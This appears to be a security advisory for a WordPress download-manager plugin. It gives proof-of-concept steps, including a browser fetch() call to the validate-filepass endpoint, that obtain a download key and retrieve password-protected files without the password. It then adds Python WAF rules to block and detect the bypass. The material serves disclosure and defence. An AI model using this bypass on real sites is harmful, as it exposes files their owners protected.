The plugin leaks master key information without requiring a password, allowing attackers to download arbitrary password-protected package files.
- Create a password-protected package containing one or more files.
- Navigate to the download page of the package (e.g. /download/package1).
- Inspect the "Download" button beside one of the packaged files and note the wpdmdl and ind URL parameters in its link for later.
- Send a POST request with an empty body to /wp-json/wpdm/validate-filepass, for example from the browser console:

```javascript
// Request a download key from the endpoint without supplying any password.
fetch("/wp-json/wpdm/validate-filepass", {
  "headers": {
    "accept": "*/*",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text()).then(text => console.log(text));
```

- The response will look like the following:

```json
{"success":true,"downloadurl":"/wp-json/wpdm/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}
```

- Construct a download URL as follows, using the _wpdmkey parameter from the response together with the wpdmdl and ind parameters noted earlier:

https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef

- See that the file can be downloaded from that URL without any knowledge of its password.
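As an added defensive example, not code from the advisory or the plugin, the following Python implements two checks a WAF or reverse-proxy filter could apply in front of the endpoint: block a validate-filepass POST that carries no body at all, and alert when the endpoint's JSON response hands out a _wpdmkey that is not bound to a package (wpdmdl=0), which is the shape of the leaked response above. The sample requests and responses are constructed from the steps above; the field name in the non-empty sample body is an assumption, since the advisory does not name the password parameter.

```python
"""Virtual-patch and detection rules for the validate-filepass key leak."""
import json
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/wp-json/wpdm/validate-filepass"


def check_request(method: str, url: str, body: str) -> str:
    """Return 'block' for a key request that sends no password material.

    The bypass described in the advisory POSTs an empty body, so a request
    with nothing in it has no legitimate reason to reach the endpoint.
    """
    if method.upper() == "POST" and urlsplit(url).path == ENDPOINT and not body.strip():
        return "block"
    return "allow"


def check_response(url: str, body: str) -> str:
    """Return 'alert' when the endpoint issues a _wpdmkey with wpdmdl=0.

    A key that is not tied to a specific package id is exactly what the
    attacker reuses against an arbitrary password-protected package.
    """
    if urlsplit(url).path != ENDPOINT:
        return "ok"
    try:
        data = json.loads(body)
    except ValueError:
        return "ok"  # not JSON, nothing to inspect
    if not data.get("success"):
        return "ok"
    query = parse_qs(urlsplit(data.get("downloadurl", "")).query)
    if "_wpdmkey" in query and query.get("wpdmdl", ["0"])[0] == "0":
        return "alert"
    return "ok"


# Constructed samples mirroring the advisory's traffic (not captured data).
LEAKED = '{"success":true,"downloadurl":"/wp-json/wpdm/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}'
BOUND = '{"success":true,"downloadurl":"/download/package1/?wpdmdl=123&_wpdmkey=abcdef&ind=12345678"}'

if __name__ == "__main__":
    print(check_request("POST", ENDPOINT, ""))           # block
    print(check_request("POST", ENDPOINT, "field=x"))    # allow (field name assumed)
    print(check_response(ENDPOINT, LEAKED))              # alert
    print(check_response(ENDPOINT, BOUND))               # ok
```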